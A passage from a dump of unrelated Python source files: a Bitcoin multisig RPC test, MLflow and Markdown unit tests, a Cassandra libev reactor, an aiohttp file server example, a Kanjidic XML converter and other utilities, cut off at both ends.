msigw = wmulti.addmultisigaddress(self.nsigs, self.pub, None, self.output_type)
maddw = msigw["address"]
mredeemw = msigw["redeemScript"]
assert_equal(desc, drop_origins(msigw['descriptor']))
# addmultisigiaddress and createmultisig work the same
assert maddw == madd
assert mredeemw == mredeem
txid = node0.sendtoaddress(madd, 40)
tx = node0.getrawtransaction(txid, True)
vout = [v["n"] for v in tx["vout"] if madd == v["scriptPubKey"]["address"]]
assert len(vout) == 1
vout = vout[0]
scriptPubKey = tx["vout"][vout]["scriptPubKey"]["hex"]
value = tx["vout"][vout]["value"]
prevtxs = [{"txid": txid, "vout": vout, "scriptPubKey": scriptPubKey, "redeemScript": mredeem, "amount": value}]
node0.generate(1)
outval = value - decimal.Decimal("0.00001000")
rawtx = node2.createrawtransaction([{"txid": txid, "vout": vout}], [{self.final: outval}])
prevtx_err = dict(prevtxs[0])
del prevtx_err["redeemScript"]
assert_raises_rpc_error(-8, "Missing redeemScript/witnessScript", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# if witnessScript specified, all ok
prevtx_err["witnessScript"] = prevtxs[0]["redeemScript"]
node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# both specified, also ok
prevtx_err["redeemScript"] = prevtxs[0]["redeemScript"]
node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# redeemScript mismatch to witnessScript
prevtx_err["redeemScript"] = "6a" # OP_RETURN
assert_raises_rpc_error(-8, "redeemScript does not correspond to witnessScript", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# redeemScript does not match scriptPubKey
del prevtx_err["witnessScript"]
assert_raises_rpc_error(-8, "redeemScript/witnessScript does not match scriptPubKey", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# witnessScript does not match scriptPubKey
prevtx_err["witnessScript"] = prevtx_err["redeemScript"]
del prevtx_err["redeemScript"]
assert_raises_rpc_error(-8, "redeemScript/witnessScript does not match scriptPubKey", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
rawtx2 = node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs - 1], prevtxs)
rawtx3 = node2.signrawtransactionwithkey(rawtx2["hex"], [self.priv[-1]], prevtxs)
self.moved += outval
tx = node0.sendrawtransaction(rawtx3["hex"], 0)
blk = node0.generate(1)[0]
assert tx in node0.getblock(blk)["tx"]
txinfo = node0.getrawtransaction(tx, True, blk)
self.log.info("n/m=%d/%d %s size=%d vsize=%d weight=%d" % (self.nsigs, self.nkeys, self.output_type, txinfo["size"], txinfo["vsize"], txinfo["weight"]))
wmulti.unloadwallet()
if __name__ == '__main__':
RpcCreateMultiSigTest().main()
|
py | 1a38b978f5f88dd52a8e5e9f09162f1a681327c0 | import pytest
from unittest import mock
import mlflow
from mlflow.exceptions import MlflowException
import mlflow.spark
from mlflow._spark_autologging import _get_current_listener, PythonSubscriber
from tests.spark.autologging.utils import _get_or_create_spark_session
@pytest.fixture()
def spark_session():
session = _get_or_create_spark_session()
yield session
session.stop()
@pytest.fixture()
def mock_get_current_listener():
with mock.patch("mlflow._spark_autologging._get_current_listener") as get_listener_patch:
get_listener_patch.return_value = None
yield get_listener_patch
@pytest.mark.usefixtures("spark_session")
def test_autolog_call_idempotent():
mlflow.spark.autolog()
listener = _get_current_listener()
mlflow.spark.autolog()
assert _get_current_listener() == listener
def test_subscriber_methods():
# Test that PythonSubscriber satisfies the contract expected by the underlying Scala trait
# it implements (MlflowAutologEventSubscriber)
subscriber = PythonSubscriber()
subscriber.ping()
# Assert repl ID is stable & different between subscribers
assert subscriber.replId() == subscriber.replId()
assert PythonSubscriber().replId() != subscriber.replId()
def test_enabling_autologging_throws_for_wrong_spark_version(
spark_session, mock_get_current_listener
):
# pylint: disable=unused-argument
with mock.patch("mlflow._spark_autologging._get_spark_major_version") as get_version_mock:
get_version_mock.return_value = 2
with pytest.raises(
MlflowException, match="Spark autologging unsupported for Spark versions < 3"
):
mlflow.spark.autolog()
|
py | 1a38baa30aa2a2a5659cab85a983457ddfd282cb | from random import choice
import numpy as np
from tensorflow.python.keras.utils.data_utils import Sequence
from debvader.normalize import Normalizer
class COSMOSsequence(Sequence):
def __init__(
self,
list_of_samples,
x_col_name,
y_col_name,
batch_size,
num_iterations_per_epoch,
normalizer=None,
):
"""
initializes the Data generator
parameters:
list_of_samples: list of paths to the datafiles.
x_col_name: column name of data to be fed as input to the network
y_col_name: column name of data to be fed as target to the network
batch_size: sample sixe for each batch
num_iterations_per_epoch: number of samples (of size = batch_size) to be drawn from the sample
normalizer: object of debvader.normalize.Normalize, used to perform norm and denorm operations (default is None).
channel_last: boolean to indicate if the the clast channel corresponds to differnet bands of the input data.
"""
self.list_of_samples = list_of_samples
self.x_col_name = x_col_name
self.y_col_name = y_col_name
self.batch_size = batch_size
self.num_iterations_per_epoch = num_iterations_per_epoch
if (normalizer is not None) and (not isinstance(normalizer, Normalizer)):
raise ValueError(
"The parameter `normalizer` should be an instance of debvader.normalize.Normalizer"
)
self.normalizer = normalizer
def __len__(self):
return self.num_iterations_per_epoch
def __getitem__(self, idx):
current_loop_file_name = choice(self.list_of_samples)
current_sample = np.load(current_loop_file_name, allow_pickle=True)
batch = np.random.choice(current_sample, size=self.batch_size, replace=False)
x = batch[self.x_col_name]
y = batch[self.y_col_name]
x = np.array(x.tolist())
y = np.array(y.tolist())
if self.normalizer is not None:
x = self.normalizer.forward(x)
y = self.normalizer.forward(y)
# flip : flipping the image array
# if not self.channel_last:
rand = np.random.randint(4)
if rand == 1:
x = np.flip(x, axis=-1)
y = np.flip(y, axis=-1)
elif rand == 2:
x = np.swapaxes(x, -1, -2)
y = np.swapaxes(y, -1, -2)
elif rand == 3:
x = np.swapaxes(np.flip(x, axis=-1), -1, -2)
y = np.swapaxes(np.flip(y, axis=-1), -1, -2)
# Change the shape of inputs and targets to feed the network
x = np.transpose(x, axes=(0, 2, 3, 1))
y = np.transpose(y, axes=(0, 2, 3, 1))
return x, y
|
py | 1a38bc342f109d22202d48bb18d1f523ad5bf8b4 | from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
if rank == 0:
data = [1,3,5,7]
comm.send(data, dest=1)
if rank == 1:
info = MPI.Status()
data = comm.recv(source=0, status=info)
print("Received %d bytes of data." % info.Get_count())
print("Received %d integers." % info.Get_elements(MPI.INT))
|
py | 1a38bc395863228a5ee95d3210ea623a7032929a | #!/usr/bin/env python3
"""Simple server written using an event loop."""
import argparse
import logging
import os
import sys
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import asyncio
import aiohttp
import aiohttp.server
class HttpRequestHandler(aiohttp.server.ServerHttpProtocol):
@asyncio.coroutine
def handle_request(self, message, payload):
print('method = {!r}; path = {!r}; version = {!r}'.format(
message.method, message.path, message.version))
path = message.path
if (not (path.isprintable() and path.startswith('/')) or '/.' in path):
print('bad path', repr(path))
path = None
else:
path = '.' + path
if not os.path.exists(path):
print('no file', repr(path))
path = None
else:
isdir = os.path.isdir(path)
if not path:
raise aiohttp.HttpProcessingError(code=404)
for hdr, val in message.headers.items():
print(hdr, val)
if isdir and not path.endswith('/'):
path = path + '/'
raise aiohttp.HttpProcessingError(
code=302, headers=(('URI', path), ('Location', path)))
response = aiohttp.Response(
self.writer, 200, http_version=message.version)
response.add_header('Transfer-Encoding', 'chunked')
# content encoding
accept_encoding = message.headers.get('accept-encoding', '').lower()
if 'deflate' in accept_encoding:
response.add_header('Content-Encoding', 'deflate')
response.add_compression_filter('deflate')
elif 'gzip' in accept_encoding:
response.add_header('Content-Encoding', 'gzip')
response.add_compression_filter('gzip')
response.add_chunking_filter(1025)
if isdir:
response.add_header('Content-type', 'text/html')
response.send_headers()
response.write(b'<ul>\r\n')
for name in sorted(os.listdir(path)):
if name.isprintable() and not name.startswith('.'):
try:
bname = name.encode('ascii')
except UnicodeError:
pass
else:
if os.path.isdir(os.path.join(path, name)):
response.write(b'<li><a href="' + bname +
b'/">' + bname + b'/</a></li>\r\n')
else:
response.write(b'<li><a href="' + bname +
b'">' + bname + b'</a></li>\r\n')
response.write(b'</ul>')
else:
response.add_header('Content-type', 'text/plain')
response.send_headers()
try:
with open(path, 'rb') as fp:
chunk = fp.read(8192)
while chunk:
response.write(chunk)
chunk = fp.read(8192)
except OSError:
response.write(b'Cannot open')
yield from response.write_eof()
if response.keep_alive():
self.keep_alive(True)
ARGS = argparse.ArgumentParser(description="Run simple HTTP server.")
ARGS.add_argument(
'--host', action="store", dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action="store", dest='port',
default=8080, type=int, help='Port number')
# make iocp and ssl mutually exclusive because ProactorEventLoop is
# incompatible with SSL
group = ARGS.add_mutually_exclusive_group()
group.add_argument(
'--iocp', action="store_true", dest='iocp', help='Windows IOCP event loop')
group.add_argument(
'--ssl', action="store_true", dest='ssl', help='Run ssl mode.')
ARGS.add_argument(
'--sslcert', action="store", dest='certfile', help='SSL cert file.')
ARGS.add_argument(
'--sslkey', action="store", dest='keyfile', help='SSL key file.')
def main():
args = ARGS.parse_args()
if ':' in args.host:
args.host, port = args.host.split(':', 1)
args.port = int(port)
if args.iocp:
from asyncio import windows_events
sys.argv.remove('--iocp')
logging.info('using iocp')
el = windows_events.ProactorEventLoop()
asyncio.set_event_loop(el)
if args.ssl:
here = os.path.join(os.path.dirname(__file__), 'tests')
if args.certfile:
certfile = args.certfile or os.path.join(here, 'sample.crt')
keyfile = args.keyfile or os.path.join(here, 'sample.key')
else:
certfile = os.path.join(here, 'sample.crt')
keyfile = os.path.join(here, 'sample.key')
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.load_cert_chain(certfile, keyfile)
else:
sslcontext = None
loop = asyncio.get_event_loop()
f = loop.create_server(
lambda: HttpRequestHandler(debug=True, keep_alive=75),
args.host, args.port,
ssl=sslcontext)
svr = loop.run_until_complete(f)
socks = svr.sockets
print('serving on', socks[0].getsockname())
try:
loop.run_forever()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
py | 1a38bc6d193e35222040f72e6d475a8c5ff47e74 | import unittest
import threading
import queue
import time
import sys
sys.path.append("./functions")
import windows
class Streamer:
def __init__(self):
self.buffer = queue.Queue(maxsize=2)
def post(self, item):
if self.buffer.full():
#print("waiting")
self.buffer.join()
#print("post item")
self.buffer.put(item)
time.sleep(0.1)
def stream(self):
while True:
try:
yield self.buffer.get(timeout=1)
self.buffer.task_done()
except queue.Empty:
return
class MyTestCase(unittest.TestCase):
def test_streaming(self):
streamer = Streamer()
def post(count):
for i in range(count):
streamer.post("%d"%i)
thread = threading.Thread(target=post,args=[9])
thread.start()
for w in windows.discrete_window_text(streamer.stream()):
print(w)
thread.join()
if __name__ == '__main__':
unittest.main()
|
py | 1a38bd61430b2697b5d3481a8f716af81ee2abe2 | # Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
from collections import deque
from functools import partial
import logging
import os
import socket
import ssl
from threading import Lock, Thread
import time
from six.moves import range
from cassandra.connection import (Connection, ConnectionShutdown,
NONBLOCKING, Timer, TimerManager)
try:
import cassandra.io.libevwrapper as libev
except ImportError:
raise ImportError(
"The C extension needed to use libev was not found. This "
"probably means that you didn't have the required build dependencies "
"when installing the driver. See "
"http://datastax.github.io/python-driver/installation.html#c-extensions "
"for instructions on installing build dependencies and building "
"the C extension.")
log = logging.getLogger(__name__)
def _cleanup(loop):
if loop:
loop._cleanup()
class LibevLoop(object):
def __init__(self):
self._pid = os.getpid()
self._loop = libev.Loop()
self._notifier = libev.Async(self._loop)
self._notifier.start()
# prevent _notifier from keeping the loop from returning
self._loop.unref()
self._started = False
self._shutdown = False
self._lock = Lock()
self._lock_thread = Lock()
self._thread = None
# set of all connections; only replaced with a new copy
# while holding _conn_set_lock, never modified in place
self._live_conns = set()
# newly created connections that need their write/read watcher started
self._new_conns = set()
# recently closed connections that need their write/read watcher stopped
self._closed_conns = set()
self._conn_set_lock = Lock()
self._preparer = libev.Prepare(self._loop, self._loop_will_run)
# prevent _preparer from keeping the loop from returning
self._loop.unref()
self._preparer.start()
self._timers = TimerManager()
self._loop_timer = libev.Timer(self._loop, self._on_loop_timer)
def maybe_start(self):
should_start = False
with self._lock:
if not self._started:
log.debug("Starting libev event loop")
self._started = True
should_start = True
if should_start:
with self._lock_thread:
if not self._shutdown:
self._thread = Thread(target=self._run_loop, name="event_loop")
self._thread.daemon = True
self._thread.start()
self._notifier.send()
def _run_loop(self):
while True:
self._loop.start()
# there are still active watchers, no deadlock
with self._lock:
if not self._shutdown and self._live_conns:
log.debug("Restarting event loop")
continue
else:
# all Connections have been closed, no active watchers
log.debug("All Connections currently closed, event loop ended")
self._started = False
break
def _cleanup(self):
self._shutdown = True
if not self._thread:
return
for conn in self._live_conns | self._new_conns | self._closed_conns:
conn.close()
for watcher in (conn._write_watcher, conn._read_watcher):
if watcher:
watcher.stop()
self.notify() # wake the timer watcher
# PYTHON-752 Thread might have just been created and not started
with self._lock_thread:
self._thread.join(timeout=1.0)
if self._thread.is_alive():
log.warning(
"Event loop thread could not be joined, so shutdown may not be clean. "
"Please call Cluster.shutdown() to avoid this.")
log.debug("Event loop thread was joined")
def add_timer(self, timer):
self._timers.add_timer(timer)
self._notifier.send() # wake up in case this timer is earlier
def _update_timer(self):
if not self._shutdown:
next_end = self._timers.service_timeouts()
if next_end:
self._loop_timer.start(next_end - time.time()) # timer handles negative values
else:
self._loop_timer.stop()
def _on_loop_timer(self):
self._timers.service_timeouts()
def notify(self):
self._notifier.send()
def connection_created(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.add(conn)
self._live_conns = new_live_conns
new_new_conns = self._new_conns.copy()
new_new_conns.add(conn)
self._new_conns = new_new_conns
def connection_destroyed(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.discard(conn)
self._live_conns = new_live_conns
new_closed_conns = self._closed_conns.copy()
new_closed_conns.add(conn)
self._closed_conns = new_closed_conns
self._notifier.send()
def _loop_will_run(self, prepare):
changed = False
for conn in self._live_conns:
if not conn.deque and conn._write_watcher_is_active:
if conn._write_watcher:
conn._write_watcher.stop()
conn._write_watcher_is_active = False
changed = True
elif conn.deque and not conn._write_watcher_is_active:
conn._write_watcher.start()
conn._write_watcher_is_active = True
changed = True
if self._new_conns:
with self._conn_set_lock:
to_start = self._new_conns
self._new_conns = set()
for conn in to_start:
conn._read_watcher.start()
changed = True
if self._closed_conns:
with self._conn_set_lock:
to_stop = self._closed_conns
self._closed_conns = set()
for conn in to_stop:
if conn._write_watcher:
conn._write_watcher.stop()
# clear reference cycles from IO callback
del conn._write_watcher
if conn._read_watcher:
conn._read_watcher.stop()
# clear reference cycles from IO callback
del conn._read_watcher
changed = True
# TODO: update to do connection management, timer updates through dedicated async 'notifier' callbacks
self._update_timer()
if changed:
self._notifier.send()
_global_loop = None
atexit.register(partial(_cleanup, _global_loop))
class LibevConnection(Connection):
"""
An implementation of :class:`.Connection` that uses libev for its event loop.
"""
_write_watcher_is_active = False
_read_watcher = None
_write_watcher = None
_socket = None
@classmethod
def initialize_reactor(cls):
global _global_loop
if not _global_loop:
_global_loop = LibevLoop()
else:
if _global_loop._pid != os.getpid():
log.debug("Detected fork, clearing and reinitializing reactor state")
cls.handle_fork()
_global_loop = LibevLoop()
@classmethod
def handle_fork(cls):
global _global_loop
if _global_loop:
_global_loop._cleanup()
_global_loop = None
@classmethod
def create_timer(cls, timeout, callback):
timer = Timer(timeout, callback)
_global_loop.add_timer(timer)
return timer
def __init__(self, *args, **kwargs):
Connection.__init__(self, *args, **kwargs)
self.deque = deque()
self._deque_lock = Lock()
self._connect_socket()
self._socket.setblocking(0)
with _global_loop._lock:
self._read_watcher = libev.IO(self._socket.fileno(), libev.EV_READ, _global_loop._loop, self.handle_read)
self._write_watcher = libev.IO(self._socket.fileno(), libev.EV_WRITE, _global_loop._loop, self.handle_write)
self._send_options_message()
_global_loop.connection_created(self)
# start the global event loop if needed
_global_loop.maybe_start()
def close(self):
with self.lock:
if self.is_closed:
return
self.is_closed = True
log.debug("Closing connection (%s) to %s", id(self), self.endpoint)
_global_loop.connection_destroyed(self)
self._socket.close()
log.debug("Closed socket to %s", self.endpoint)
# don't leave in-progress operations hanging
if not self.is_defunct:
self.error_all_requests(
ConnectionShutdown("Connection to %s was closed" % self.endpoint))
def handle_write(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
while True:
try:
with self._deque_lock:
next_msg = self.deque.popleft()
except IndexError:
return
try:
sent = self._socket.send(next_msg)
except socket.error as err:
if (err.args[0] in NONBLOCKING or
err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE)):
with self._deque_lock:
self.deque.appendleft(next_msg)
else:
self.defunct(err)
return
else:
if sent < len(next_msg):
with self._deque_lock:
self.deque.appendleft(next_msg[sent:])
def handle_read(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
try:
while True:
buf = self._socket.recv(self.in_buffer_size)
self._iobuf.write(buf)
if len(buf) < self.in_buffer_size:
break
except socket.error as err:
if ssl and isinstance(err, ssl.SSLError):
if err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE):
return
else:
self.defunct(err)
return
elif err.args[0] in NONBLOCKING:
return
else:
self.defunct(err)
return
if self._iobuf.tell():
self.process_io_buffer()
else:
log.debug("Connection %s closed by server", self)
self.close()
def push(self, data):
sabs = self.out_buffer_size
if len(data) > sabs:
chunks = []
for i in range(0, len(data), sabs):
chunks.append(data[i:i + sabs])
else:
chunks = [data]
with self._deque_lock:
self.deque.extend(chunks)
_global_loop.notify()
|
py | 1a38bd8887ec6fb8e7ce9321a8ad4b00b05b6a88 | import logging
from peek_platform import PeekPlatformConfig
from peek_platform.sw_install.PeekSwInstallManagerABC import PeekSwInstallManagerABC
__author__ = 'synerty'
logger = logging.getLogger(__name__)
class PeekSwInstallManager(PeekSwInstallManagerABC):
def __init__(self):
PeekSwInstallManagerABC.__init__(self)
self._restarting = False
def _stopCode(self):
PeekPlatformConfig.pluginLoader.unloadAllPlugins()
def _upgradeCode(self):
pass
def _startCode(self):
PeekPlatformConfig.pluginLoader.loadAllPlugins()
def restartProcess(self):
# When we receive this signal, the processes have already been instructed
# to shutdown
self._restarting = True
logger.info("Shutting down celery workers")
from peek_plugin_base.worker.CeleryApp import celeryApp
celeryApp.control.broadcast('shutdown')
@property
def restartTriggered(self):
return self._restarting
def realyRestartProcess(self):
PeekSwInstallManagerABC.restartProcess(self)
|
py | 1a38bd969158aee7f00f6cd828e6511b14a06aff | from xml.etree import ElementTree as ET
import re
import copy
import json
from tqdm import tqdm
FILE = 'kanjidic2.xml'
TEMPLATE = {
"kanji": "",
"strokes": 0,
"freq": None,
"jlpt": None,
"grade": 0,
"reading": {
"kun": [],
"on": []
},
"meaning": [],
"name_reading": []
}
def parse_misc(elements, new):
for ele in elements:
if ele.tag.lower() == "grade":
new['grade'] = ele.text
elif ele.tag.lower() == 'stroke_count':
new['strokes'] = ele.text
elif ele.tag.lower() == 'freq':
new['freq'] = ele.text
elif ele.tag.lower() == "jlpt":
new['jlpt'] = ele.text
def parse_literal(elements, new):
new['kanji'] = elements.text
def parse_rmgroup(elements, new):
for ele in elements:
if ele.tag.lower() == "reading":
if ele.attrib:
if ele.attrib['r_type'] == "ja_on":
new['reading']['on'].append(ele.text)
elif ele.attrib['r_type'] == "ja_kun":
new['reading']['kun'].append(ele.text)
elif ele.tag.lower() == "meaning":
if ele.attrib:
if ele.attrib['m_lang'] == "en":
new["meaning"].append(ele.text)
else:
new['meaning'].append(ele.text)
def parse_readings(elements, new):
for ele in elements:
if ele.tag.lower() == "rmgroup":
parse_rmgroup(ele, new)
elif ele.tag.lower() == "nanori":
new['name_reading'].append(ele.text)
def xml_parser():
i = 0
f = ET.iterparse(FILE)
DATA = []
for event, elements in tqdm(f):
if event == 'end' and elements.tag == 'character':
new_ele = copy.deepcopy(TEMPLATE)
for ele in elements.iter():
if ele.tag.lower() == "literal":
parse_literal(ele, new_ele)
elif ele.tag.lower() == "reading_meaning":
parse_readings(ele, new_ele)
elif ele.tag.lower() == "misc":
parse_misc(ele, new_ele)
DATA.append(new_ele)
return {"words": DATA}
def xml_to_json():
""" Convert xml to json and save to file """
file = open("Kanjidic.json", "w", encoding="utf8")
print("Beginning conversion of Kanjidic")
json.dump(xml_parser(), file, indent=2, ensure_ascii=False)
print("Conversion finished")
print("Saving to file...")
file.close()
if __name__ == "__main__":
xml_to_json() |
py | 1a38be6e6a4c724bcc4e0caa8c10161b937b8b20 | """
Python Markdown
A Python implementation of John Gruber's Markdown.
Documentation: https://python-markdown.github.io/
GitHub: https://github.com/Python-Markdown/markdown/
PyPI: https://pypi.org/project/Markdown/
Started by Manfred Stienstra (http://www.dwerg.net/).
Maintained for a few years by Yuri Takhteyev (http://www.freewisdom.org).
Currently maintained by Waylan Limberg (https://github.com/waylan),
Dmitry Shachnev (https://github.com/mitya57) and Isaac Muse (https://github.com/facelessuser).
Copyright 2007-2018 The Python Markdown Project (v. 1.7 and later)
Copyright 2004, 2005, 2006 Yuri Takhteyev (v. 0.2-1.6b)
Copyright 2004 Manfred Stienstra (the original version)
License: BSD (see LICENSE.md for details).
Python-Markdown Regression Tests
================================
Tests of the various APIs with the python markdown lib.
"""
import unittest
import sys
import os
import markdown
import warnings
from markdown.__main__ import parse_options
from logging import DEBUG, WARNING, CRITICAL
import yaml
import tempfile
from io import BytesIO
import xml.etree.ElementTree as etree
from xml.etree.ElementTree import ProcessingInstruction
class TestMarkdownBasics(unittest.TestCase):
""" Tests basics of the Markdown class. """
def setUp(self):
""" Create instance of Markdown. """
self.md = markdown.Markdown()
def testBlankInput(self):
""" Test blank input. """
self.assertEqual(self.md.convert(''), '')
def testWhitespaceOnly(self):
""" Test input of only whitespace. """
self.assertEqual(self.md.convert(' '), '')
def testSimpleInput(self):
""" Test simple input. """
self.assertEqual(self.md.convert('foo'), '<p>foo</p>')
def testInstanceExtension(self):
""" Test Extension loading with a class instance. """
from markdown.extensions.footnotes import FootnoteExtension
markdown.Markdown(extensions=[FootnoteExtension()])
def testEntryPointExtension(self):
""" Test Extension loading with an entry point. """
markdown.Markdown(extensions=['footnotes'])
def testDotNotationExtension(self):
""" Test Extension loading with Name (`path.to.module`). """
markdown.Markdown(extensions=['markdown.extensions.footnotes'])
def testDotNotationExtensionWithClass(self):
""" Test Extension loading with class name (`path.to.module:Class`). """
markdown.Markdown(extensions=['markdown.extensions.footnotes:FootnoteExtension'])
class TestConvertFile(unittest.TestCase):
""" Tests of ConvertFile. """
def setUp(self):
self.saved = sys.stdin, sys.stdout
sys.stdin = BytesIO(bytes('foo', encoding='utf-8'))
sys.stdout = BytesIO()
def tearDown(self):
sys.stdin, sys.stdout = self.saved
def getTempFiles(self, src):
""" Return the file names for two temp files. """
infd, infile = tempfile.mkstemp(suffix='.txt')
with os.fdopen(infd, 'w') as fp:
fp.write(src)
outfd, outfile = tempfile.mkstemp(suffix='.html')
return infile, outfile, outfd
def testFileNames(self):
infile, outfile, outfd = self.getTempFiles('foo')
markdown.markdownFromFile(input=infile, output=outfile)
with os.fdopen(outfd, 'r') as fp:
output = fp.read()
self.assertEqual(output, '<p>foo</p>')
def testFileObjects(self):
infile = BytesIO(bytes('foo', encoding='utf-8'))
outfile = BytesIO()
markdown.markdownFromFile(input=infile, output=outfile)
outfile.seek(0)
self.assertEqual(outfile.read().decode('utf-8'), '<p>foo</p>')
def testStdinStdout(self):
markdown.markdownFromFile()
sys.stdout.seek(0)
self.assertEqual(sys.stdout.read().decode('utf-8'), '<p>foo</p>')
class TestBlockParser(unittest.TestCase):
""" Tests of the BlockParser class. """
def setUp(self):
""" Create instance of BlockParser. """
self.parser = markdown.Markdown().parser
def testParseChunk(self):
""" Test BlockParser.parseChunk. """
root = etree.Element("div")
text = 'foo'
self.parser.parseChunk(root, text)
self.assertEqual(
markdown.serializers.to_xhtml_string(root),
"<div><p>foo</p></div>"
)
def testParseDocument(self):
""" Test BlockParser.parseDocument. """
lines = ['#foo', '', 'bar', '', ' baz']
tree = self.parser.parseDocument(lines)
self.assertIsInstance(tree, etree.ElementTree)
self.assertIs(etree.iselement(tree.getroot()), True)
self.assertEqual(
markdown.serializers.to_xhtml_string(tree.getroot()),
"<div><h1>foo</h1><p>bar</p><pre><code>baz\n</code></pre></div>"
)
class TestBlockParserState(unittest.TestCase):
""" Tests of the State class for BlockParser. """
def setUp(self):
self.state = markdown.blockparser.State()
def testBlankState(self):
""" Test State when empty. """
self.assertEqual(self.state, [])
def testSetSate(self):
""" Test State.set(). """
self.state.set('a_state')
self.assertEqual(self.state, ['a_state'])
self.state.set('state2')
self.assertEqual(self.state, ['a_state', 'state2'])
def testIsSate(self):
""" Test State.isstate(). """
self.assertEqual(self.state.isstate('anything'), False)
self.state.set('a_state')
self.assertEqual(self.state.isstate('a_state'), True)
self.state.set('state2')
self.assertEqual(self.state.isstate('state2'), True)
self.assertEqual(self.state.isstate('a_state'), False)
self.assertEqual(self.state.isstate('missing'), False)
def testReset(self):
""" Test State.reset(). """
self.state.set('a_state')
self.state.reset()
self.assertEqual(self.state, [])
self.state.set('state1')
self.state.set('state2')
self.state.reset()
self.assertEqual(self.state, ['state1'])
class TestHtmlStash(unittest.TestCase):
""" Test Markdown's HtmlStash. """
def setUp(self):
self.stash = markdown.util.HtmlStash()
self.placeholder = self.stash.store('foo')
def testSimpleStore(self):
""" Test HtmlStash.store. """
self.assertEqual(self.placeholder, self.stash.get_placeholder(0))
self.assertEqual(self.stash.html_counter, 1)
self.assertEqual(self.stash.rawHtmlBlocks, ['foo'])
def testStoreMore(self):
""" Test HtmlStash.store with additional blocks. """
placeholder = self.stash.store('bar')
self.assertEqual(placeholder, self.stash.get_placeholder(1))
self.assertEqual(self.stash.html_counter, 2)
self.assertEqual(
self.stash.rawHtmlBlocks,
['foo', 'bar']
)
def testReset(self):
""" Test HtmlStash.reset. """
self.stash.reset()
self.assertEqual(self.stash.html_counter, 0)
self.assertEqual(self.stash.rawHtmlBlocks, [])
class Item:
""" A dummy Registry item object for testing. """
def __init__(self, data):
self.data = data
def __repr__(self):
return repr(self.data)
def __eq__(self, other):
return self.data == other
class RegistryTests(unittest.TestCase):
""" Test the processor registry. """
def testCreateRegistry(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
self.assertEqual(len(r), 1)
self.assertIsInstance(r, markdown.util.Registry)
def testRegisterWithoutPriority(self):
r = markdown.util.Registry()
with self.assertRaises(TypeError):
r.register(Item('a'))
def testSortRegistry(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 21)
r.register(Item('c'), 'c', 20.5)
self.assertEqual(len(r), 3)
self.assertEqual(list(r), ['b', 'c', 'a'])
def testIsSorted(self):
r = markdown.util.Registry()
self.assertIs(r._is_sorted, False)
r.register(Item('a'), 'a', 20)
list(r)
self.assertIs(r._is_sorted, True)
r.register(Item('b'), 'b', 21)
self.assertIs(r._is_sorted, False)
r['a']
self.assertIs(r._is_sorted, True)
r._is_sorted = False
r.get_index_for_name('a')
self.assertIs(r._is_sorted, True)
r._is_sorted = False
repr(r)
self.assertIs(r._is_sorted, True)
def testDeregister(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
r.register(Item('c'), 'c', 40)
self.assertEqual(len(r), 3)
r.deregister('b')
self.assertEqual(len(r), 2)
r.deregister('c', strict=False)
self.assertEqual(len(r), 1)
# deregister non-existent item with strict=False
r.deregister('d', strict=False)
self.assertEqual(len(r), 1)
with self.assertRaises(ValueError):
# deregister non-existent item with strict=True
r.deregister('e')
self.assertEqual(list(r), ['a'])
def testRegistryContains(self):
r = markdown.util.Registry()
item = Item('a')
r.register(item, 'a', 20)
self.assertIs('a' in r, True)
self.assertIn(item, r)
self.assertNotIn('b', r)
def testRegistryIter(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(list(r), ['b', 'a'])
def testRegistryGetItemByIndex(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r[0], 'b')
self.assertEqual(r[1], 'a')
with self.assertRaises(IndexError):
r[3]
def testRegistryGetItemByItem(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r['a'], 'a')
self.assertEqual(r['b'], 'b')
with self.assertRaises(KeyError):
r['c']
def testRegistrySetItem(self):
r = markdown.util.Registry()
with self.assertRaises(TypeError):
r[0] = 'a'
with self.assertRaises(TypeError):
r['a'] = 'a'
def testRegistryDelItem(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
with self.assertRaises(TypeError):
del r[0]
with self.assertRaises(TypeError):
del r['a']
def testRegistrySlice(self):
r = markdown.util.Registry()
